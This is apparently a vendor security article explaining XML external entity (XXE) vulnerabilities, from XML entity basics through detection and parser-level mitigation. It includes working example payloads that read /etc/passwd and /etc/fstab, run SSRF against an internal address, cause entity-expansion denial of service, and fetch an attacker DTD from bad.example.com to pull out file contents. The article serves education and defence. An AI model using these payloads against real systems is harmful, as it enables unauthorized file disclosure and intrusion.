XML external entity (XXE)

What are XXE vulnerabilities?

XML external entity (XXE) vulnerabilities (also called XML external entity injections or XXE injections) happen if a web application or API accepts unsanitized XML data and its back-end XML parser is configured to allow external XML entity parsing. XXE vulnerabilities can let malicious hackers perform attacks such as server-side request forgery (SSRF), local file inclusion (LFI), directory traversal, remote code execution (RCE), network port scanning, and denial of service (DoS).


Severity: severe
Prevalence: discovered rarely
Scope: may appear in web apps and APIs that accept XML input
Technical impact: SSRF, LFI, RCE, DoS
Worst-case consequences: full system compromise
Quick fix: configure the XML parser to disallow XML external entities

Note that XXE vulnerabilities were first featured in the OWASP Top 10 list in 2017 and immediately made it to the A4 spot. In the OWASP Top 10 for 2021, they are grouped with security misconfigurations under A5.

How do XML external entity attacks work?

For XXE attacks to be possible, a web application or API needs to meet two requirements:

  • It must accept XML input from the user and parse it using a back-end XML parser
  • The XML parser must have XML external entities support enabled

To understand what makes this security vulnerability possible, we need to start with some XML basics.

How do web applications and APIs use XML?

Web applications and APIs often use the extensible markup language (XML) to communicate with one another and to accept structured data from users. Common use cases include:

  • Web services and APIs: Web services and APIs often transmit data between the client and the server using XML. This is especially common in the case of older web services that use the SOAP standard.
  • Content management systems: Some content management systems (CMS) allow users to upload content in XML format. Such import functionality could be there, for example, to import and convert blog posts from an older CMS or to process uploaded DOCX files or SVG images (both of which are XML documents).
  • E-commerce: Some e-commerce solutions exchange data with other systems using XML. For example, they may use XML documents to communicate with inventory management systems or payment gateways.

To provide such functionality, the web application or API uses a back-end XML parser, usually an imported library written in the same language as the application. Examples include SimpleXML for PHP, DocumentBuilder for Java, ElementTree for Python, XmlReader for .NET, or DOMParser for JavaScript.

What are DTDs and XML entities?

An XML document can declare the structure that valid documents of its type must follow. Knowing this, the parser can determine whether the input data is a valid XML document of the expected type and then process its content. There are two main formats for defining the document type: the more powerful and complex XML schema definitions (XSD) and the simpler, older document type definitions (DTD). DTDs are sometimes considered outdated (they are derived from SGML, the ancestor of XML), but they are still widely supported and used.

XML entities are named placeholders that stand for characters that are not easily typed or have special meaning, or for longer pieces of text. Entities are declared in a DTD using an <!ENTITY> declaration. To refer to a declared entity, you use its name preceded by an ampersand (&) and followed by a semicolon (;). You may be familiar with entities in HTML, for example, &amp; and &nbsp;.

One use for XML entities in DTDs is to incorporate external content or references into the DTD itself, or into documents that use the DTD. Such inclusions are called external XML entities (XXE). XXEs can be abused by malicious hackers to access local files, URLs on a local network, and more.

Types of XXE attacks

There are three basic types of XXE attacks: in-band XXE, out-of-band XXE, and blind XXE.

  • In an in-band XXE attack, the attacker sends the attack and receives a response through the same channel, for example, via a direct HTTP request and response.
  • In an out-of-band (OOB) XXE attack, the vulnerable system sends the results of an attack to a different resource controlled by the attacker. For example, the attack may be performed using a direct request but cause the hacked web server to send a sensitive file to the attacker’s own web server.
  • In a blind XXE attack, the attacker does not receive any direct response or result following an attack. Instead, they observe the behavior of the vulnerable web application (for example, the error messages it generates) to determine whether the attack was successful and use this indirect feedback to exfiltrate information step-by-step.

In this guide, we will focus on in-band XXE attacks, but the techniques described here can also be used for OOB XXE and blind XXE attacks.

Examples of XXE attacks

XXE attacks are performed by defining malicious XML entities in user input that will be parsed by a back-end XML parser. Here is an example of a simple (non-malicious) XML entity definition. It declares an internal entity, so nothing is loaded from outside the document yet:

Request:

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY bar "World">
]>
<foo>
  Hello &bar;
</foo>

Response:

HTTP/1.0 200 OK
Hello World
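
To see the same expansion outside of an HTTP exchange, here is a minimal sketch that assumes Python and its standard-library ElementTree parser (not necessarily what runs behind example.com). The expand helper is a hypothetical name used only for illustration, and the XML declaration is left out because the document is passed in as a Python string.

```python
import xml.etree.ElementTree as ET

# Same document as in the request above, minus the XML declaration.
DOC = """<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY bar "World">
]>
<foo>
  Hello &bar;
</foo>"""


def expand(doc: str) -> str:
    """Parse the document and return the root element's text, trimmed."""
    root = ET.fromstring(doc)
    return (root.text or "").strip()


if __name__ == "__main__":
    # The parser replaces &bar; with the value declared in the DTD.
    print(expand(DOC))
```

The application never sees the &bar; reference: by the time it reads the element text, the parser has already substituted the entity value.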

Example of an XXE DoS attack

XML entity definitions can themselves contain references to other entities. This allows an attacker to create a nested chain of references that requires very little input data but expands into a lot of output. In the example below, &t3; expands to 2 × 4 × 5 = 40 copies of the original string. Such output may be used to exhaust the XML processor memory and potentially even overload the web server. By extending the following example with even more entities, an attacker could easily create an entity so large that it would exhaust the memory of any XML parser that tried to process it, resulting in a denial of service.

Request:

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?> 
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY bar "World ">
  <!ENTITY t1 "&bar;&bar;">
  <!ENTITY t2 "&t1;&t1;&t1;&t1;">
  <!ENTITY t3 "&t2;&t2;&t2;&t2;&t2;">
]>
<foo>
  Hello &t3;
</foo>

Response:

HTTP/1.0 200 OK
Hello World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World
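
The growth is multiplicative, which is why a few extra lines of DTD are enough to cause trouble. The following sketch (Python, with hypothetical helper names) computes the expansion factor from the number of references per level and, for the small example above only, cross-checks it with the standard-library ElementTree parser. We assume here that the classic billion laughs payload uses nine levels of ten references each.

```python
import math
import xml.etree.ElementTree as ET


def expansion_factor(refs_per_level):
    """Copies of the innermost string produced by a chain of nested entities."""
    return math.prod(refs_per_level)


# The example above: t1 has 2 references, t2 has 4, t3 has 5.
SMALL = """<!DOCTYPE foo [
  <!ENTITY bar "World ">
  <!ENTITY t1 "&bar;&bar;">
  <!ENTITY t2 "&t1;&t1;&t1;&t1;">
  <!ENTITY t3 "&t2;&t2;&t2;&t2;&t2;">
]>
<foo>Hello &t3;</foo>"""


def count_copies(doc: str, word: str = "World") -> int:
    """Parse a (small!) document and count how often word appears in its text."""
    return "".join(ET.fromstring(doc).itertext()).count(word)


if __name__ == "__main__":
    print(expansion_factor([2, 4, 5]))   # factor for the example above
    print(count_copies(SMALL))           # same number, measured by parsing
    print(expansion_factor([10] * 9))    # nine levels of ten references
```

Only the arithmetic is applied to the large case; actually parsing such a document is exactly what the attack relies on.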

Example of XXE local data exfiltration

XXE definitions may include URL schemes such as file: in entity values. As a result, an attacker can include a reference to a file in the local file system that is accessible from the web server. This could be, for example, a file such as /etc/passwd or one of the source code files of the web application. The results of such an attack are similar to a local file inclusion attack combined with directory traversal.

Request:

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?> 
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM
  "file:///etc/passwd">
]>
<foo>
  &xxe;
</foo>

Response:

HTTP/1.0 200 OK
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh 
(...)
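
Whether a payload like this succeeds depends entirely on the parser and its configuration. As a rough self-check, the sketch below assumes Python's standard-library ElementTree, which is documented not to expand external entities. It writes a marker string to a temporary file, references that file through an external entity, and reports whether the marker shows up in the parsed text. All function names are hypothetical.

```python
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path


def xxe_payload(file_uri: str) -> str:
    """Build a document whose only content is an external entity reference."""
    return (
        "<!DOCTYPE foo [\n"
        "  <!ELEMENT foo ANY>\n"
        f'  <!ENTITY xxe SYSTEM "{file_uri}">\n'
        "]>\n"
        "<foo>&xxe;</foo>"
    )


def text_or_none(xml_doc: str):
    """Return the document's text, or None if the parser rejects the document."""
    try:
        root = ET.fromstring(xml_doc)
    except ET.ParseError:
        return None
    return "".join(root.itertext())


def leaks(marker: str) -> bool:
    """True if the marker written to a temp file appears in the parsed output."""
    with tempfile.TemporaryDirectory() as tmp:
        target = Path(tmp) / "secret.txt"
        target.write_text(marker)
        result = text_or_none(xxe_payload(target.as_uri()))
    return result is not None and marker in result


if __name__ == "__main__":
    print("file contents leaked:", leaks("marker-1234"))
```

Running the same kind of check against the parser and settings your application actually uses is a quick way to confirm that external entities are not being resolved.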

Example of XXE-based SSRF

XXE definitions may also contain URLs that link to external resources. Since the request to the URL is made from the web application itself because that’s where the XML is parsed, this allows for server-side request forgery. The attacker can then access files on the local network as if located inside that network, thus bypassing protection such as firewalls.

Request:

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?> 
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM
  "http://192.168.0.1/secret.txt">
]>
<foo>
  &xxe;
</foo>

Response:

HTTP/1.0 200 OK
Content of the secret.txt file on the local network (behind the firewall)
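
The key point is that the parser, running on the server, is the component that would fetch the URL. The sketch below illustrates this with Python's xml.sax module, deliberately switched to a permissive configuration (external general entities enabled). Instead of fetching anything, a custom entity resolver records the system identifier it was asked for and aborts parsing, so no network request is made. RecordingResolver, EntityBlocked, and requested_system_ids are hypothetical names.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, EntityResolver, feature_external_ges


class EntityBlocked(Exception):
    """Raised by the resolver instead of fetching an external entity."""


class RecordingResolver(EntityResolver):
    """Records every system identifier the parser asks to resolve."""

    def __init__(self):
        self.requested = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        raise EntityBlocked(systemId)  # abort before anything is fetched


PAYLOAD = b"""<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "http://192.168.0.1/secret.txt">
]>
<foo>&xxe;</foo>"""


def requested_system_ids(xml_bytes: bytes):
    """Return the external resources the parser tried to load for this input."""
    resolver = RecordingResolver()
    parser = xml.sax.make_parser()
    # Assumption: simulate a permissive setup; recent Python versions default to False.
    parser.setFeature(feature_external_ges, True)
    parser.setEntityResolver(resolver)
    parser.setContentHandler(ContentHandler())
    try:
        parser.parse(io.BytesIO(xml_bytes))
    except EntityBlocked:
        pass
    return resolver.requested


if __name__ == "__main__":
    print(requested_system_ids(PAYLOAD))
```

With a default resolver in place of the recording one, that identifier is what the server itself would request from inside the network.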

Limitations and workarounds for exfiltrating XML data

There is one major limitation when using XXE to exfiltrate data. The entire response is parsed as XML, so if the exfiltrated data contains or even only resembles XML, it will also be parsed as XML. This can cause a parser error or scramble the exfiltrated data:

Request:

POST http://example.com/xml HTTP/1.1
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY bar SYSTEM
  "file:///etc/fstab">
]>
]>
<foo>
  &bar;
</foo>

Response:

HTTP/1.0 500 Internal Server Error
File "file:///etc/fstab", line 3
lxml.etree.XMLSyntaxError: Specification mandate value for attribute system, line 3, column 15...

As a result, simple XXE attacks can only be used to obtain files or responses that are considered valid XML by the parser, meaning that you cannot use them to obtain binary files.

XML itself includes a workaround for this problem. There are legitimate cases when you may need to store XML special characters in XML files. For this purpose, XML provides CDATA (character data) tags that can contain any special characters:

<data><![CDATA[ < " ' & > characters are ok in here ]]></data>

Using parameter entities with CDATA

In addition to general entities, XML also supports parameter entities. Parameter entities are only used in document type definitions (DTDs).

A parameter entity starts with the % character. This character instructs the XML parser that a parameter entity is being defined, as opposed to a general entity. In the following non-malicious example, a parameter entity is used to define a general entity which is then called from the XML document.

Request:

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
  <!ENTITY % paramEntity
  "<!ENTITY genEntity 'bar'>">
  %paramEntity;
]>
<data>&genEntity;</data>

Response:

HTTP/1.0 200 OK
bar

By combining parameter entities and CDATA tags, an attacker can create a malicious DTD hosted on bad.example.com/evil.dtd:

Request:

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
  <!ENTITY % dtd SYSTEM
  "http://bad.example.com/evil.dtd">
  %dtd;
  %all;
]>
<data>&fileContents;</data>

Attacker DTD (bad.example.com/evil.dtd):

<!ENTITY % file SYSTEM "file:///etc/fstab">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents 
'%start;%file;%end;'>">

When an attacker sends the above XXE payload, the XML parser will first attempt to process the %dtd parameter entity by making a request to http://bad.example.com/evil.dtd. After the attacker’s DTD has been downloaded, the XML parser will load the %file parameter entity (from evil.dtd), which in this example points to /etc/fstab. Next, the parser wraps the contents of the file in CDATA tags defined using the %start and %end parameter entities. Finally, everything gets stored in yet another parameter entity called %all.

The heart of the trick is that %all actually defines a general entity called &fileContents that can be included as part of the response. The end result is the contents of the /etc/fstab file wrapped in CDATA tags.
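
The effect of the wrapping can be simulated without any external DTD. The sketch below (Python, standard-library ElementTree, hypothetical helper names) simply concatenates the three pieces the way '%start;%file;%end;' does and compares parsing the raw text with parsing the wrapped text. The sample text is an assumption modeled on a typical fstab header, which contains angle brackets.

```python
import xml.etree.ElementTree as ET


def build_file_contents(file_text: str) -> str:
    """Mimic '%start;%file;%end;' by plain string concatenation."""
    start, end = "<![CDATA[", "]]>"   # values of %start; and %end;
    return f"{start}{file_text}{end}"


def parse_data(inner: str):
    """Parse <data>inner</data>; return its text, or None on a parser error."""
    try:
        return ET.fromstring(f"<data>{inner}</data>").text
    except ET.ParseError:
        return None


# Assumed sample: the comment line looks like markup to an XML parser.
FSTAB_LIKE = "# <file system> <mount point>\nproc /proc proc defaults 0 0\n"

if __name__ == "__main__":
    print(parse_data(FSTAB_LIKE))                              # None: parser error
    print(parse_data(build_file_contents(FSTAB_LIKE)) == FSTAB_LIKE)
```

One remaining limit is worth keeping in mind: a file that itself contains the sequence ]]> would end the CDATA section early, so the wrapped text would no longer be read as a single block of character data.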

Using PHP protocol wrappers

If the web application vulnerable to XXE is a PHP application, new attack vectors open up thanks to PHP protocol wrappers. PHP protocol wrappers are I/O streams that allow access to PHP input and output streams.

An attacker can use the php://filter wrapper to Base64-encode the contents of a file. Since Base64 output consists only of letters, digits, and the +, /, and = characters, it never contains XML markup, so an attacker can simply encode files on the server and then decode them on the receiving end. Crucially, this method allows the attacker to steal binary files, too.

Request:

POST http://example.com/xml.php HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY bar SYSTEM
  "php://filter/read=convert.base64-encode/resource=/etc/fstab">
]>
<foo>
  &bar;
</foo>

Response:

HTTP/1.0 200 OK
IyAvZXRjL2ZzdGFiOiBzdGF0aWMgZmlsZSBzeXN0ZW0gaW5mb3JtYXRpb24uDQojDQojIDxmaWxlIHN5c3RlbT4gPG1vdW50IHBvaW50PiAgIDx0eXBlPiAgPG9wdGlvbnM+ICAgICAgIDxkdW1wPiAgPHBhc3M+DQoNCnByb2MgIC9wcm9jICBwcm9jICBkZWZhdWx0cyAgMCAgMA0KIyAvZGV2L3NkYTUNClVVSUQ9YmUzNWE3MDktYzc4Ny00MTk4LWE5MDMtZDVmZGM4MGFiMmY4ICAvICBleHQzICByZWxhdGltZSxlcnJvcnM9cmVtb3VudC1ybyAgMCAgMQ0KIyAvZGV2L3NkYTYNClVVSUQ9Y2VlMTVlY2EtNWIyZS00OGFkLTk3MzUtZWFlNWFjMTRiYzkwICBub25lICBzd2...
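
Decoding on the receiving end is trivial. The sketch below (Python; decode_prefix and is_xml_safe are hypothetical helper names) decodes the beginning of the response shown above and checks that Base64 output never contains the characters that are special in XML. Because the response above is truncated, the helper decodes only the longest prefix that consists of complete four-character groups.

```python
import base64


def decode_prefix(b64_text: str) -> bytes:
    """Decode the longest complete Base64 prefix of a possibly truncated string."""
    cleaned = "".join(b64_text.split())        # drop any line breaks or spaces
    usable = len(cleaned) - len(cleaned) % 4   # keep whole 4-character groups only
    return base64.b64decode(cleaned[:usable])


def is_xml_safe(data: bytes) -> bool:
    """True if the Base64 form of data contains none of the characters < > &."""
    encoded = base64.b64encode(data).decode("ascii")
    return not set(encoded) & set("<>&")


# First 60 characters of the response shown above.
RESPONSE_START = "IyAvZXRjL2ZzdGFiOiBzdGF0aWMgZmlsZSBzeXN0ZW0gaW5mb3JtYXRpb24u"

if __name__ == "__main__":
    print(decode_prefix(RESPONSE_START).decode("ascii"))
    # prints: # /etc/fstab: static file system information.
    print(is_xml_safe(bytes(range(256))))      # every possible byte value
```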

Potential consequences of an XXE attack

If the XML parser used by a web application supports XML external entities, attackers can use the techniques described above to abuse XXE definitions and perform a variety of attacks, including:

  • Denial of service: If the attacker defines entities that reference one another in nested layers, they can perform a DoS attack called the billion laughs attack. This attack causes the XML parser to run out of memory and may cause the web server to stop responding. The same can happen if the XXE points to a large file or a stream from the server, for example, /dev/urandom on Linux.
  • Port scanning: If the attacker creates XXEs that attempt to connect to a specific port on a machine within the local network, the host responses may allow them to determine whether that port is open or not. By repeating this process for multiple ports, attackers can perform port scans behind a firewall.
  • Local file inclusion and directory traversal: If the attacker creates an XXE that points to a local file on the server, they can read sensitive data from local files, which would be equivalent to performing an LFI with path traversal. For example, they could read the /etc/passwd file on Linux systems.
  • Server-side request forgery: If the attacker creates an XXE that points to a URL, they can perform an SSRF attack. Since the URL is accessed by the web application itself, the request will be seen as coming from the application, not the user. This may allow attackers to access systems protected by firewalls and whitelists.
  • Remote code execution (RCE): In rare cases, for example, when the PHP expect:// wrapper is available (it requires the expect extension to be installed), it is possible to perform remote code execution through XXE, as demonstrated by Airman.

How to detect XXE vulnerabilities?

The best way to detect XXE vulnerabilities depends on whether they are already known or unknown.

  • If you only use commercial or open-source software and do not develop software of your own, you may find it enough to identify the exact version of the system or application that you are using. If the identified version has an XXE vulnerability, you can assume that you are susceptible to that vulnerability. You can identify the version manually or use a suitable security tool, such as software composition analysis (SCA) software in the case of web applications or a network scanner in the case of networked systems and applications.
  • If you develop your own software or want to potentially find unknown XXE vulnerabilities (zero-days) in known applications, you must be able to successfully exploit the XXE vulnerability to be certain that it exists. In such cases, you need to either perform manual penetration testing with the help of security researchers or penetration testers, or use an application security testing tool (web vulnerability scanner) that can automatically exploit vulnerabilities. Examples of such tools are Invicti and Acunetix by Invicti. We recommend using this method even for known vulnerabilities.

How to prevent XXE vulnerabilities in web applications?

Since XXE is considered a type of XML injection attack, some sources will simply recommend input validation and sanitization of XML documents through filtering and escaping to prevent potentially harmful content from being interpreted as XML. This also includes creating whitelists and blacklists for XML content. However, we do not recommend this approach since, due to the way that XML input is used by most applications, it is not practical to apply manual sanitization and validation.

A large part of XML communication between web applications and APIs (as well as communication with users) involves passing complete XML documents, so filtering and escaping all content in such documents is very troublesome and, unless done properly, can make the entire document invalid. Following OWASP documentation, we recommend that instead of trying to prevent XXE in specific applications, developers and web server administrators should work together to implement general mitigation guidelines by disallowing XML external entities on the level of the XML parser, not the web application.

How to mitigate XXE attacks?

The only effective way to mitigate XXE attacks is to configure the XML parser so that it never processes external entities in XML content coming from untrusted sources. OWASP additionally recommends completely disabling the processing of external document type definitions and restricting developers only to static, local DTDs. If the functionality of your web application depends on the use of external DTDs, you can prevent XXE attacks by disabling support for external entities in external DTDs.

To learn how to disable DTD and XXE processing in your specific XML parser, refer to the relevant OWASP XXE prevention cheat sheet, which contains instructions for many commonly used programming languages and XML parsers.
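
As an illustration of the strictest option (no DTDs at all), here is a minimal Python sketch that refuses any input containing a document type declaration before handing it to ElementTree. It is not taken from the OWASP cheat sheet: parse_untrusted and DTDForbidden are hypothetical names, and the pre-check uses the standard-library expat bindings, whose StartDoctypeDeclHandler callback fires when a DOCTYPE is encountered.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when untrusted XML contains a document type declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Called by expat as soon as it sees <!DOCTYPE ...>; raising aborts parsing.
    raise DTDForbidden(f"DOCTYPE {name!r} is not allowed in untrusted input")


def parse_untrusted(xml_bytes: bytes) -> ET.Element:
    """Parse XML only if it declares no DTD (and therefore no entities)."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(xml_bytes, True)   # first pass: well-formedness and DOCTYPE check
    return ET.fromstring(xml_bytes)  # second pass: build the element tree


if __name__ == "__main__":
    print(parse_untrusted(b"<foo>Hello</foo>").text)
    try:
        parse_untrusted(b'<!DOCTYPE foo [<!ENTITY bar "World">]><foo>&bar;</foo>')
    except DTDForbidden as exc:
        print("rejected:", exc)
```

Parsing the input twice keeps the sketch short at the cost of some extra work per document. In production code, prefer the parser-level settings documented for your language and library.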

Frequently asked questions

What are XML external entity (XXE) vulnerabilities?

XXE vulnerabilities are caused by the permissive configuration of XML parsers. XML parsers used by web servers often allow the use of XML entities from external sources. Attackers may abuse this feature and use XML external entities to include malicious content or access sensitive information.

Read more about out-of-band XXE.

How dangerous are XXE vulnerabilities?

External XML entities may allow an attacker to access confidential information as well as perform server-side request forgery (SSRF) attacks. In some cases, XXE may even enable port scanning or lead to remote code execution.

Read more about SSRF vulnerabilities.

How to prevent XXE vulnerabilities?

The best way to prevent XXE vulnerabilities is to completely disable support for document type definitions (DTDs) in your XML parser. If this is not possible, you need to at least disable support for external entities and external document type declarations for your parser.

Learn how to disable external entities and external document type declarations for your language and parser.

Classification  ID
CAPEC           201
CWE             611
WASC            43
OWASP 2021      A5

Written by: Tomasz Andrzej Nidecki, reviewed by: Benjamin Daniel Mussler